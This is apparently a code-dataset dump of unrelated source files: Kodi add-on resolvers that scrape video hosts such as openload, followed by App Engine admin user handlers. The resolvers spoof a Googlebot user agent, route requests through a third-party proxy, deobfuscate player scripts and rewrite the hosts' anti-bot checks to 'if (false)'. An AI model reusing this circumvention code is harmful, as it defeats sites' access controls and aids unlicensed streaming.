# Host resolvers for a Kodi (XBMC) live-TV add-on.  Each class scrapes one
# hosting site and exposes getMediaUrl() returning a playable stream URL.
# Python 2 code (urllib2, HTMLParser, unicode/unichr).
import json, re, xbmc, urllib, xbmcgui, os, sys, pprint, urlparse, urllib2, base64, math, string, socket, xbmcaddon
import htmlentitydefs
from cPacker import cPacker
from t0mm0.common.net import Net
import jsunpacker
from AADecoder import AADecoder
from JsParser import JsParser
from JJDecoder import JJDecoder
from cPacker import cPacker
from png import Reader as PNGReader
from HTMLParser import HTMLParser
import time
import HTMLParser

try:
    # Pre-create a TLSv1 context; silently skipped where ssl is unavailable.
    import ssl
    context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
except:
    pass

__ADDON_ID__ = xbmcaddon.Addon().getAddonInfo("id")
__ADDON__ = xbmcaddon.Addon(__ADDON_ID__)
AddonTitle = __ADDON__.getAddonInfo('name')


def clean(text):
    # Replace a fixed set of HTML entities with their plain-text equivalents.
    command={'&#8220;':'"','&#8221;':'"', '&#8211;':'-','&amp;':'&','&#8217;':"'",'&#8216;':"'"}
    regex = re.compile("|".join(map(re.escape, command.keys())))
    return regex.sub(lambda mo: command[mo.group(0)], text)


def log(msg, level=xbmc.LOGNOTICE):
    # Log to both stdout and the Kodi log, encoding unicode first; all
    # failures are deliberately swallowed (logging must never crash playback).
    level = xbmc.LOGNOTICE
    print(AddonTitle+': %s' % (msg))
    try:
        if isinstance(msg, unicode):
            msg = msg.encode('utf-8')
        xbmc.log(AddonTitle+': %s' % (msg), level)
    except Exception as e:
        try:
            a=1
        except:
            pass


class RapidVideo():
    """Resolver for rapidvideo/raptu-style embed pages."""

    def __init__(self, url):
        self.url = url
        self.net = Net()
        self.headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"}
        self.legenda = ''  # subtitle URL filled in by getMediaUrl()

    def getId(self):
        # The media id is the last path component of the URL.
        return urlparse.urlparse(self.url).path.split("/")[-1]

    def abrirRapidVideo(self, url):
        # Fetch the page through a proxy endpoint, pretending to be Googlebot.
        headers = { 'User-Agent' : 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' }
        req = urllib2.Request('https://ooops.rf.gd/url.php?url=' + url, headers=headers)
        response = urllib2.urlopen(req)
        link=response.read()
        response.close()
        return link

    def getMediaUrl(self):
        """Scrape the page for stream links; ask the user to pick a quality.

        Returns the chosen stream URL, or '' when nothing was found.
        """
        try:
            sourceCode = self.net.http_GET(self.url, headers=self.headers).content.decode('unicode_escape')
        except:
            # Direct fetch failed — retry via the proxy endpoint.
            headers = { 'User-Agent' : 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' }
            req = urllib2.Request('https://ooops.rf.gd/url.php?url=' + self.url, headers=headers)
            response = urllib2.urlopen(req)
            sourceCode=response.read()
            response.close()
        html_parser = HTMLParser.HTMLParser()
        sourceCode = html_parser.unescape(sourceCode)
        videoUrl = ''
        # Some pages gate the player behind a confirm form ("block" input).
        sPattern = '<input type="hidden" value="(\d+)" name="block">'
        aResult1 = self.parse(sourceCode,sPattern)
        if (aResult1[0] == True):
            # NOTE(review): 'headeres' looks like a typo for 'headers' —
            # confirm against Net.http_POST's signature.
            sourceCode = self.net.http_POST(self.url, 'confirm.x=74&confirm.y=35&block=1', headeres=self.headers)
        # Capture (stream URL, vertical resolution) pairs from the JWPlayer config.
        sPattern = '"file":"([^"]+)","label":"([0-9]+)p.+?'
        aResult = self.parse(sourceCode, sPattern)
        try:
            # Captions track, if present, lives on the raptu.com host.
            self.legenda = "https://www.raptu.com%s"%re.compile('"file":"([^"]+)","label":".+?","kind":"captions"').findall(sourceCode)[0]
            #log(self.legenda)
        except:
            self.legenda = ''
        if aResult[0]:
            links = []
            qualidades = []
            for aEntry in aResult[1]:
                links.append(aEntry[0])
                if aEntry[1] == '2160':
                    qualidades.append('4K')
                else:
                    qualidades.append(aEntry[1]+'p')
            if len(links) == 1:
                videoUrl = links[0]
            elif len(links) > 1:
                # Show highest quality first, then let the user choose.
                links.reverse()
                qualidades.reverse()
                qualidade = xbmcgui.Dialog().select('Escolha a qualidade', qualidades)
                videoUrl = links[qualidade]
        return videoUrl

    def getLegenda(self):
        # Returns the subtitle URL found by the last getMediaUrl() call.
        return self.legenda

    def parse(self, sHtmlContent, sPattern, iMinFoundValue = 1):
        # Returns (found, matches): found is True when at least
        # iMinFoundValue matches were captured.
        sHtmlContent = self.replaceSpecialCharacters(str(sHtmlContent))
        aMatches = re.compile(sPattern, re.IGNORECASE).findall(sHtmlContent)
        if (len(aMatches) >= iMinFoundValue):
            return True, aMatches
        return False, aMatches

    def replaceSpecialCharacters(self, sString):
        # Normalise escaped slashes, entities and whitespace before regex matching.
        return sString.replace('\\/','/').replace('&amp;','&').replace('\xc9','E').replace('&#8211;', '-').replace('&#038;', '&').replace('&rsquo;','\'').replace('\r','').replace('\n','').replace('\t','').replace('&#039;',"'")


class CloudMailRu():
    """Resolver for cloud.mail.ru public share links."""

    def __init__(self, url):
        self.url = url
        self.net = Net()
        self.headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"}

    def getId(self):
        # Public share id: everything after /public/.
        return re.compile('(?:\/\/|\.)cloud\.mail\.ru\/public\/(.+)').findall(self.url)[0]

    def getMediaUrl(self):
        """Return (download URL, file extension) for the shared file.

        Builds the URL from the page's weblink endpoint, share id and
        download token.
        """
        conteudo = self.net.http_GET(self.url).content
        ext = re.compile('<meta name=\"twitter:image\" content=\"(.+?)\"/>').findall(conteudo)[0]
        streamAux = clean(ext.split('/')[-1])
        extensaoStream = clean(streamAux.split('.')[-1])
        token = re.compile('"tokens"\s*:\s*{\s*"download"\s*:\s*"([^"]+)').findall(conteudo)[0]
        mediaLink = re.compile('"weblink_get"\s*:\s*\[.+?"url"\s*:\s*"([^"]+)').findall(conteudo)[0]
        videoUrl = '%s/%s?key=%s' % (mediaLink, self.getId(), token)
        return videoUrl, extensaoStream


class GoogleVideo():
    """Resolver for Google Drive / Google Video file links."""

    def __init__(self, url):
        self.url = url
        self.net = Net()
        self.headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"}
        self.UA = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0'

    def getId(self):
        # The file id is the second-to-last path component.
        return urlparse.urlparse(self.url).path.split("/")[-2]

    def getMediaUrl(self):
        """Pick a stream from fmt_stream_map; returns (url|headers, quality).

        The returned URL carries User-Agent and the session cookies, which
        Google requires for playback.
        """
        req = urllib2.Request(self.url)
        response = urllib2.urlopen(req)
        sourceCode = response.read()
        Headers = response.headers
        response.close()
        try:
            sourceCode = sourceCode.decode('unicode_escape')
        except:
            pass
        # Re-assemble the Set-Cookie header into a single cookie string.
        c = Headers['Set-Cookie']
        c2 = re.findall('(?:^|,) *([^;,]+?)=([^;,\/]+?);',c)
        if c2:
            cookies = ''
            for cook in c2:
                cookies = cookies + cook[0] + '=' + cook[1]+ ';'
        # Known Google itag -> container mapping.
        formatos = { '5': {'ext': 'flv'}, '6': {'ext': 'flv'}, '13': {'ext': '3gp'}, '17': {'ext': '3gp'}, '18': {'ext': 'mp4'}, '22': {'ext': 'mp4'}, '34': {'ext': 'flv'}, '35': {'ext': 'flv'}, '36': {'ext': '3gp'}, '37': {'ext': 'mp4'}, '38': {'ext': 'mp4'}, '43': {'ext': 'webm'}, '44': {'ext': 'webm'}, '45': {'ext': 'webm'}, '46': {'ext': 'webm'}, '59': {'ext': 'mp4'} }
        formatosLista = re.search(r'"fmt_list"\s*,\s*"([^"]+)', sourceCode).group(1)
        formatosLista = formatosLista.split(',')
        streamsLista = re.search(r'"fmt_stream_map"\s*,\s*"([^"]+)', sourceCode).group(1)
        streamsLista = streamsLista.split(',')
        videos = []
        qualidades = []
        i = 0
        for stream in streamsLista:
            # Each entry is "itag|url"; fmt_list holds "itag/WxH" at the same index.
            formatoId, streamUrl = stream.split('|')
            form = formatos.get(formatoId)
            extensao = form['ext']
            resolucao = formatosLista[i].split('/')[1]
            largura, altura = resolucao.split('x')
            # Only offer mp4/flv streams (skip 3gp/webm).
            if 'mp' in extensao or 'flv' in extensao:
                qualidades.append(altura+'p '+extensao)
                videos.append(streamUrl)
            i+=1
        qualidade = xbmcgui.Dialog().select('Escolha a qualidade', qualidades)
        return videos[qualidade]+'|User-Agent=' + self.UA + '&Cookie=' + cookies, qualidades[qualidade].split('p ')[-1]


class UpToStream():
    """Resolver for uptostream.com embeds."""

    def __init__(self, url):
        self.url = url
        self.net = Net()
        self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0', 'Accept-Charset': 'utf-8;q=0.7,*;q=0.7'}

    def getId(self):
        # Supports both /iframe/<id> and plain /<id> URLs.
        if 'iframe' in self.url:
            return re.compile('http\:\/\/uptostream\.com\/iframe\/(.+)').findall(self.url)[0]
        else:
            return re.compile('http\:\/\/uptostream\.com\/(.+)').findall(self.url)[0]

    def getMediaUrl(self):
        """Collect <source> tags, let the user pick a quality, return its URL."""
        sourceCode = self.net.http_GET(self.url, headers=self.headers).content
        links = re.compile('source\s+src=[\'\"]([^\'\"]+)[\'\"].+?data-res=[\'\"]([^\"\']+)[\'\"]').findall(sourceCode)
        videos = []
        qualidades = []
        for link, qualidade in links:
            if link.startswith('//'):
                # Protocol-relative URL — force http.
                link = "http:"+link
            videos.append(link)
            qualidades.append(qualidade)
        # Show highest quality first.
        videos.reverse()
        qualidades.reverse()
        qualidade = xbmcgui.Dialog().select('Escolha a qualidade', qualidades)
        return videos[qualidade]


class OpenLoad():
    """Resolver for openload.co embeds.

    Tries to decode the obfuscated player JavaScript on the page; if that
    fails, falls back to the openload API with IP pairing.
    """

    def __init__(self, url):
        self.url = url
        self.net = Net()
        self.id = str(self.getId())
        self.messageOk = xbmcgui.Dialog().ok
        self.site = 'https://openload.co'
        #self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0', 'Accept-Charset': 'utf-8;q=0.7,*;q=0.7'}
        self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3', 'Accept-Encoding': 'none', 'Accept-Language': 'en-US,en;q=0.8', 'Referer': url}

    # Code updated from: https://github.com/Kodi-vStream/venom-xbmc-addons/
    def ASCIIDecode(self, string):
        # Decode literal \xNN and \uNNNN escapes into characters.
        i = 0
        l = len(string)
        ret = ''
        while i < l:
            c =string[i]
            if string[i:(i+2)] == '\\x':
                c = chr(int(string[(i+2):(i+4)],16))
                i+=3
            if string[i:(i+2)] == '\\u':
                cc = int(string[(i+2):(i+6)],16)
                if cc > 256:  # it's unicode, not ascii — give up
                    return ''
                c = chr(cc)
                i+=5
            ret = ret + c
            i = i + 1
        return ret

    def SubHexa(self, g):
        # re.sub callback: keep group 1, replace the hex literal with decimal.
        return g.group(1) + self.Hexa(g.group(2))

    def Hexa(self, string):
        # Convert a "0x.." literal to its decimal string (base 0 auto-detects).
        return str(int(string, 0))

    def parseInt(self, sin):
        # JS-style parseInt: digits before the first ',' or '.', else None.
        return int(''.join([c for c in re.split(r'[,.]',str(sin))[0] if c.isdigit()])) if re.match(r'\d+', str(sin), re.M) and not callable(sin) else None

    # NOTE(review): the following three helpers shadow the builtin `str`
    # with their parameter name.
    def CheckCpacker(self, str):
        # Unpack Dean Edwards p.a.c.k.e.r-style eval(function...) payloads.
        sPattern = '(\s*eval\s*\(\s*function(?:.|\s)+?{}\)\))'
        aResult = re.findall(sPattern,str)
        if (aResult):
            str2 = aResult[0]
            if not str2.endswith(';'):
                str2 = str2 + ';'
            try:
                str = cPacker().unpack(str2)
                print('Cpacker encryption')
            except:
                pass
        return str

    def CheckJJDecoder(self, str):
        # Unpack JJEncode-obfuscated payloads.
        sPattern = '([a-z]=.+?\(\)\)\(\);)'
        aResult = re.findall(sPattern,str)
        if (aResult):
            print('JJ encryption')
            return JJDecoder(aResult[0]).decode()
        return str

    def CheckAADecoder(self, str):
        # Unpack AAEncode ("゚ω゚") obfuscated payloads in place.
        aResult = re.search('([>;]\s*)(゚ω゚.+?\(\'_\'\);)', str,re.DOTALL | re.UNICODE)
        if (aResult):
            print('AA encryption')
            tmp = aResult.group(1) + AADecoder(aResult.group(2)).decode()
            return str[:aResult.start()] + tmp + str[aResult.end():]
        return str

    def CleanCode(self, code,Coded_url):
        # Normalise the decoded player JS so JsParser can interpret it:
        # strip wrappers, neutralise anti-tamper checks, expand hex literals.
        # extract complete code
        r = re.search(r'type="text\/javascript">(.+?)<\/script>', code,re.DOTALL)
        if r:
            code = r.group(1)
        # first decoding pass
        code = self.ASCIIDecode(code)
        #fh = open('c:\\html2.txt', "w")
        #fh.write(code)
        #fh.close()
        # extract first part
        P3 = "^(.+?)}\);\s*\$\(\"#videooverlay"
        r = re.search(P3, code,re.DOTALL)
        if r:
            code = r.group(1)
        else:
            log('er1')
            return False
        # hack — to be removed in the future
        code = code.replace('!![]','true')
        P8 = '\$\(document\).+?\(function\(\){'
        code= re.sub(P8,'\n',code)
        # Disable document-based anti-bot branches.
        P4 = 'if\(!_[0-9a-z_\[\(\'\)\]]+,document[^;]+\)\){'
        code = re.sub(P4,'if (false) {',code)
        P4 = 'if\(+\'toString\'[^;]+document[^;]+\){'
        code = re.sub(P4,'if (false) {',code)
        # hex conversion
        code = re.sub('([^_])(0x[0-9a-f]+)',self.SubHexa,code)
        # line breaks
        #code = code.replace(';',';\n')
        code = code.replace('case','\ncase')
        code = code.replace('}','\n}\n')
        code = code.replace('{','{\n')
        # tabs
        code = code.replace('\t','')
        # hack
        code = code.replace('!![]','true')
        return code

    def __replaceSpecialCharacters(self, sString):
        # Same normalisation as RapidVideo.replaceSpecialCharacters.
        return sString.replace('\\/','/').replace('&amp;','&').replace('\xc9','E').replace('&#8211;', '-').replace('&#038;', '&').replace('&rsquo;','\'').replace('\r','').replace('\n','').replace('\t','').replace('&#039;',"'")

    def parserOPENLOADIO(self, urlF):
        """Resolve ``urlF`` to a stream URL.

        Primary path: download the embed page, peel up to 4 layers of
        packer/JJ/AA obfuscation off the player script, run it through
        JsParser and read back "#streamurl".  On ANY failure, fall back to
        the openload streaming API (with interactive IP pairing).
        """
        try:
            req = urllib2.Request(urlF, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0'})
            response = urllib2.urlopen(req)
            html = response.read()
            response.close()
            try:
                html = html.encode('utf-8')
            except:
                pass
            TabUrl = []
            # The encoded URL is hidden in a <span id=...>...</span>.
            sPattern = '<span id="([^"]+)">([^<>]+)<\/span>'
            aResult = self.parse(html, sPattern)
            if (aResult[0]):
                TabUrl = aResult[1]
            else:
                #log("No Encoded Section Found. Deleted?")
                raise ResolverError('No Encoded Section Found. Deleted?')
            sPattern = '<script src="\/assets\/js\/video-js\/video\.js.+?.js"(.+)*'
            aResult = self.parse(html, sPattern)
            if (aResult[0]):
                sHtmlContent2 = aResult[1][0]
                code = ''
                maxboucle = 4
                sHtmlContent3 = sHtmlContent2
                # Peel up to 4 nested obfuscation layers.
                while (maxboucle > 0):
                    sHtmlContent3 = self.CheckCpacker(sHtmlContent3)
                    sHtmlContent3 = self.CheckJJDecoder(sHtmlContent3)
                    sHtmlContent3 = self.CheckAADecoder(sHtmlContent3)
                    maxboucle = maxboucle - 1
                code = sHtmlContent3
            if not (code):
                #log("No Encoded Section Found. Deleted?")
                raise ResolverError('No Encoded Section Found. Deleted?')
            Coded_url = ''
            # Heuristic: the encoded payload span is the one longer than 30 chars.
            for i in TabUrl:
                if len(i[1]) > 30:
                    Coded_url = i[1]
                    Item_url = '#'+ i[0]
            if not(Coded_url):
                raise ResolverError('No Encoded Section Found. Deleted?')
            code = self.CleanCode(code, Coded_url)
            xbmc.executebuiltin("Notification(%s,%s,%s)" % (AddonTitle, "A Descomprimir Openload, aguarde!", 15000))
            JP = JsParser()
            Liste_var = []
            JP.AddHackVar(Item_url, Coded_url)
            try:
                JP.ProcessJS(code, Liste_var)
                url = JP.GetVarHack("#streamurl")
            except:
                raise ResolverError('No Encoded Section Found. Deleted?')
            if not(url):
                raise ResolverError('No Encoded Section Found. Deleted?')
            api_call = "https://openload.co/stream/" + url + "?mime=true"
            # Known decoy stream returned when decoding went wrong.
            if 'KDA_8nZ2av4/x.mp4' in api_call:
                #log('Openload.co resolve failed')
                raise ResolverError('Openload.co resolve failed')
            if url == api_call:
                #log('pigeon url : ' + api_call)
                api_call = ''
                raise ResolverError('pigeon url : ' + api_call)
            return api_call
        #ResolverError,
        except (Exception, ResolverError):
            # Fallback: the official API, possibly requiring IP pairing.
            try:
                media_id = self.getId()
                log("API OPENLOAD")
                video_url = self.__check_auth(media_id)
                if not video_url:
                    video_url = self.__auth_ip(media_id)
                if video_url:
                    return video_url
                else:
                    raise ResolverError("Sem autorização do Openload")
            except ResolverError:
                self.messageOk(AddonTitle, 'Ocorreu um erro a obter o link. Escolha outro servidor.')

    def _api_get_url(self, url):
        # GET an openload API endpoint; raise unless status == 200.
        result = self.net.http_GET(url).content
        js_result = json.loads(result)
        if js_result['status'] != 200:
            raise ResolverError(js_result['status'], js_result['msg'])
        return js_result

    def __auth_ip(self, media_id):
        # Interactive IP pairing: show the pair URL in a countdown dialog and
        # poll __check_auth until it succeeds or the dialog expires.
        js_data = self._api_get_url('https://api.openload.co/1/streaming/info')
        pair_url = js_data.get('result', {}).get('auth_url', '')
        if pair_url:
            pair_url = pair_url.replace('\/', '/')
            header = "Autorização do Openload"
            line1 = "Para visualizar este video, é necessaria autorização"
            line2 = "Acede ao link em baixo para permitires acesso ao video:"
            line3 = "[B][COLOR blue]%s[/COLOR][/B] e clica em 'Pair'" % (pair_url)
            with CountdownDialog(header, line1, line2, line3) as cd:
                return cd.start(self.__check_auth, [media_id])

    def __check_auth(self, media_id):
        # Returns the stream URL, or None while the IP is not yet paired (403).
        try:
            js_data = self._api_get_url('https://api.openload.co/1/streaming/get?file=%s' % media_id)
        except ResolverError as e:
            status, msg = e
            if status == 403:
                return
            else:
                raise ResolverError(msg)
        return js_data.get('result', {}).get('url')

    def getId(self):
        # Extract the file id from /embed/<id>/, /embed/<id> or /f/<id>/ URLs.
        #return self.url.split('/')[-1]
        try:
            try:
                return re.compile('https\:\/\/openload\.co\/embed\/(.+)\/').findall(self.url)[0]
            except:
                return re.compile('https\:\/\/openload\.co\/embed\/(.+)').findall(self.url)[0]
        except:
            return re.compile('https\:\/\/openload.co\/f\/(.+?)\/').findall(self.url)[0]

    def unescape(self, text):
        # Replace HTML numeric and named entities with their characters.
        def fixup(m):
            text = m.group(0)
            if text[:2] == "&#":
                try:
                    if text[:3] == "&#x":
                        return unichr(int(text[3:-1], 16))
                    else:
                        return unichr(int(text[2:-1]))
                except ValueError:
                    pass
            else:
                try:
                    text = unichr(htmlentitydefs.name2codepoint[text[1:-1]])
                except KeyError:
                    pass
            return text # leave as is
        return re.sub("&#?\w+;", fixup, text)

    def getMediaUrl(self):
        videoUrl = self.parserOPENLOADIO(self.url)
        return videoUrl

    def getDownloadUrl(self):
        # NOTE(review): calls self.decodeOpenLoad, which is not defined in
        # this file's visible portion — confirm it exists elsewhere.
        content = self.net.http_GET(self.url, headers=self.headers).content
        url = self.decodeOpenLoad(str(content.encode('utf-8')))
        return url

    def parse(self, sHtmlContent, sPattern, iMinFoundValue = 1):
        # Same contract as RapidVideo.parse: (found, matches).
        sHtmlContent = self.__replaceSpecialCharacters(str(sHtmlContent))
        aMatches = re.compile(sPattern, re.IGNORECASE).findall(sHtmlContent)
        if (len(aMatches) >= iMinFoundValue):
            return True, aMatches
        return False, aMatches

    # NOTE(review): duplicate of the parseInt defined above — the later
    # definition wins at class-creation time.
    def parseInt(self, sin):
        return int(''.join([c for c in re.split(r'[,.]',str(sin))[0] if c.isdigit()])) if re.match(r'\d+', str(sin), re.M) and not callable(sin) else None

    def getSubtitle(self):
        # Scrape the captions <track> from the embed page, if any.
        pageOpenLoad = self.net.http_GET(self.url, headers=self.headers).content
        try:
            subtitle = re.compile('<track\s+kind="captions"\s+src="(.+?)"').findall(pageOpenLoad)[0]
        except:
            subtitle = ''
        #return self.site + subtitle
        return subtitle


class VideoMega():
    """Resolver for videomega.tv embeds (served via its cdn.php endpoint)."""

    def __init__(self, url):
        self.url = url
        self.net = Net()
        self.id = str(self.getId())
        self.messageOk = xbmcgui.Dialog().ok
        self.site = 'https://videomega.tv'
        # Mobile UA — the mobile page exposes a plain <source> tag.
        self.headers = 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25'
        self.headersComplete = {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25', 'Referer': self.getNewHost()}

    def getId(self):
        return re.compile('http\:\/\/videomega\.tv\/view\.php\?ref=(.+?)&width=700&height=430').findall(self.url)[0]

    def getNewHost(self):
        return 'http://videomega.tv/cdn.php?ref=%s' % (self.id)

    def getMediaUrl(self):
        # Returns "<stream>|User-Agent=<ua>" or shows an error dialog.
        sourceCode = self.net.http_GET(self.getNewHost(), headers=self.headersComplete).content
        match = re.search('<source\s+src="([^"]+)"', sourceCode)
        if match:
            return match.group(1) + '|User-Agent=%s' % (self.headers)
        else:
            self.messageOk(AddonTitle, 'Video nao encontrado.')


class Vidzi():
    """Resolver for vidzi.tv embeds (packed JWPlayer config)."""

    def __init__(self, url):
        self.url = url
        self.net = Net()
        self.id = str(self.getId())
        self.messageOk = xbmcgui.Dialog().ok
        self.site = 'https://videomega.tv'
        self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'}
        self.subtitle = ''  # filled in by getMediaUrl()

    def getId(self):
        return re.compile('http\:\/\/vidzi.tv\/embed-(.+?)-').findall(self.url)[0]

    def getNewHost(self):
        return 'http://vidzi.tv/embed-%s.html' % (self.id)

    def getMediaUrl(self):
        """Return the stream URL, unpacking the page JS when necessary."""
        sourceCode = self.net.http_GET(self.getNewHost(), headers=self.headers).content
        if '404 Not Found' in sourceCode:
            self.messageOk(AddonTitle, 'Ficheiro nao encontrado ou removido. Escolha outro servidor.')
        match = re.search('file\s*:\s*"([^"]+)', sourceCode)
        if match:
            return match.group(1) + '|Referer=http://vidzi.tv/nplayer/jwpayer.flash.swf'
        else:
            # Config is inside a packed eval(function...) blob — unpack each one.
            for pack in re.finditer('(eval\(function.*?)</script>', sourceCode, re.DOTALL):
                dataJs = jsunpacker.unpack(pack.group(1)) # Unpacker for Dean Edward's p.a.c.k.e.r | THKS
                #print dataJs
                #pprint.pprint(dataJs)
                stream = re.search('file\s*:\s*"([^"]+)', dataJs)
                # Subtitle track: try .srt first, then .vtt.
                try:
                    subtitle = re.compile('tracks:\[\{file:"(.+?)\.srt"').findall(dataJs)[0]
                    subtitle += ".srt"
                except:
                    try:
                        subtitle = re.compile('tracks:\[\{file:"(.+?)\.vtt"').findall(dataJs)[0]
                        subtitle += ".vtt"
                    except:
                        subtitle = ''
                self.subtitle = subtitle
                if stream:
                    return stream.group(1)
            self.messageOk(AddonTitle, 'Video nao encontrado. Escolha outro servidor')

    def getSubtitle(self):
        # Subtitle URL found by the last getMediaUrl() call ('' if none).
        return self.subtitle


# tknorris code: https://github.com/tknorris/script.module.urlresolver/
class CountdownDialog(object):
    """Progress dialog that polls ``func`` until it succeeds or time runs out.

    Used for openload IP pairing: ``start`` calls ``func`` immediately, then
    once per ``interval`` seconds while counting down, returning the first
    truthy result.
    """
    __INTERVALS = 5  # UI updates (and cancel checks) per polling interval

    def __init__(self, heading, line1='', line2='', line3='', active=True, countdown=60, interval=5):
        self.heading = heading
        self.countdown = countdown
        self.interval = interval
        self.line3 = line3
        if active:
            #if xbmc.getCondVisibility('Window.IsVisible(progressdialog)'):
            #    pd = ProgressDialog()
            #else:
            pd = xbmcgui.DialogProgress()
            if not self.line3:
                line3 = 'Expires in: %s seconds' % (countdown)
            pd.create(self.heading, line1, line2, line3)
            pd.update(100)
            self.pd = pd
        else:
            self.pd = None

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        if self.pd is not None:
            self.pd.close()
            del self.pd

    def start(self, func, args=None, kwargs=None):
        if args is None: args = []
        if kwargs is None: kwargs = {}
        # Try once immediately before showing any countdown.
        result = func(*args, **kwargs)
        if result:
            return result
        if self.pd is not None:
            start = time.time()
            expires = time_left = self.countdown
            interval = self.interval
            while time_left > 0:
                # Sleep in small slices so cancel is responsive.
                for _ in range(CountdownDialog.__INTERVALS):
                    xbmc.sleep(interval * 1000 / CountdownDialog.__INTERVALS)
                    if self.is_canceled(): return
                time_left = expires - int(time.time() - start)
                if time_left < 0: time_left = 0
                progress = time_left * 100 / expires
                line3 = 'Expires in: %s seconds' % (time_left) if not self.line3 else ''
                self.update(progress, line3=line3)
                result = func(*args, **kwargs)
                if result:
                    return result

    def is_canceled(self):
        if self.pd is None:
            return False
        else:
            return self.pd.iscanceled()

    def update(self, percent, line1='', line2='', line3=''):
        if self.pd is not None:
            self.pd.update(percent, line1, line2, line3)


class ResolverError(Exception):
    # Raised by resolvers when a link cannot be resolved.
    pass
gpl-2.0
mats116/gae-boilerplate
bp_admin/users.py
11
3991
# -*- coding: utf-8 -*-
# Admin handlers for listing, charting and editing users (GAE boilerplate).
import webapp2
from google.appengine.datastore.datastore_query import Cursor
from google.appengine.ext import ndb
from collections import OrderedDict, Counter
from wtforms import fields
from bp_includes import forms
from bp_includes.lib.basehandler import BaseHandler


class AdminUserGeoChartHandler(BaseHandler):
    def get(self):
        """Render a geochart of user counts grouped by country."""
        # Projection query: only the country property is fetched.
        users = self.user_model.query().fetch(projection=['country'])
        users_by_country = Counter()
        for user in users:
            if user.country:
                users_by_country[user.country] += 1
        params = {
            "data": users_by_country.items()
        }
        return self.render_template('admin_users_geochart.html', **params)


class EditProfileForm(forms.EditProfileForm):
    # Admin-only extension of the user profile form: allows toggling activation.
    activated = fields.BooleanField('Activated')


class AdminUserListHandler(BaseHandler):
    def get(self):
        """Paginated, searchable user list.

        Query params: ``q`` search term, ``c`` urlsafe datastore cursor,
        ``p`` set to 'prev' when paging backwards (the backward page is
        fetched with a reversed ordering and then flipped for display).
        """
        p = self.request.get('p')
        q = self.request.get('q')
        c = self.request.get('c')
        forward = True if p not in ['prev'] else False
        cursor = Cursor(urlsafe=c)

        if q:
            # Exact (lower-cased) match against last name, email or username.
            qry = self.user_model.query(ndb.OR(self.user_model.last_name == q.lower(),
                                               self.user_model.email == q.lower(),
                                               self.user_model.username == q.lower()))
        else:
            qry = self.user_model.query()

        PAGE_SIZE = 50
        if forward:
            users, next_cursor, more = qry.order(self.user_model.key).fetch_page(PAGE_SIZE, start_cursor=cursor)
            if next_cursor and more:
                self.view.next_cursor = next_cursor
            if c:
                # Reversed cursor lets the template link back to the previous page.
                self.view.prev_cursor = cursor.reversed()
        else:
            # Backward page: reverse the sort, fetch, then restore display order.
            users, next_cursor, more = qry.order(-self.user_model.key).fetch_page(PAGE_SIZE, start_cursor=cursor)
            users = list(reversed(users))
            if next_cursor and more:
                self.view.prev_cursor = next_cursor
            self.view.next_cursor = cursor.reversed()

        def pager_url(p, cursor):
            # Build a pager link preserving the search term and direction.
            params = OrderedDict()
            if q:
                params['q'] = q
            if p in ['prev']:
                params['p'] = p
            if cursor:
                params['c'] = cursor.urlsafe()
            return self.uri_for('admin-users-list', **params)

        self.view.pager_url = pager_url
        self.view.q = q

        params = {
            "list_columns": [('username', 'Username'),
                             ('name', 'Name'),
                             ('last_name', 'Last Name'),
                             ('email', 'Email'),
                             ('country', 'Country'),
                             ('tz', 'TimeZone')],
            "users": users,
            "count": qry.count()
        }
        return self.render_template('admin_users_list.html', **params)


class AdminUserEditHandler(BaseHandler):
    def get_or_404(self, user_id):
        """Return the user entity for ``user_id`` or abort with 404."""
        try:
            user = self.user_model.get_by_id(long(user_id))
            if user:
                return user
        except ValueError:
            # Non-numeric id falls through to the 404.
            pass
        self.abort(404)

    def edit(self, user_id):
        """GET: show the edit form pre-filled; POST: validate and save."""
        if self.request.POST:
            user = self.get_or_404(user_id)
            if self.form.validate():
                self.form.populate_obj(user)
                user.put()
                self.add_message("Changes saved!", 'success')
                return self.redirect_to("admin-user-edit", user_id=user_id)
            else:
                self.add_message("Could not save changes!", 'danger')
        else:
            user = self.get_or_404(user_id)
            # Pre-fill the form from the stored entity on GET.
            # NOTE(review): indentation reconstructed — confirm process() is
            # meant to run only on the GET branch.
            self.form.process(obj=user)
        params = {
            'user': user
        }
        return self.render_template('admin_user_edit.html', **params)

    @webapp2.cached_property
    def form(self):
        # Built once per request; choice lists come from the base handler.
        f = EditProfileForm(self)
        f.country.choices = self.countries_tuple
        f.tz.choices = self.tz
        return f
lgpl-3.0
julien78910/CouchPotatoServer
libs/pyutil/platformutil.py
106
3607
